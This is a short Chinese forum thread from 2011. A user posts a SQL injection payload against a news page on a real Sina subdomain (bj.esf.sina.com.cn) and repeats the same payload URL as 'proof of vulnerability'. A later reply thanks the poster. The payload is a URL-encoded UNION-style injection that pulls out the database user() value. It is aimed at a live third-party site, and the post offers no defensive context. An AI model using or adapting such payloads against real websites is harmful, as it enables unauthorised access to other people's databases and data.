骑驴上高速 发表于 2011-7-10 15:20:38

新浪旁站的注入漏洞。。

http://bj.esf.sina.com.cn/news/n ... 6%BB%FA%B2%E9%D1%AF()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23
漏洞证明:
http://bj.esf.sina.com.cn/news/n ... 6%BB%FA%B2%E9%D1%AF()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23

zju 发表于 2013-9-27 09:15:26

找到好贴不容易,我顶你了,谢了
页: [1]
查看完整版本: 新浪旁站的注入漏洞。。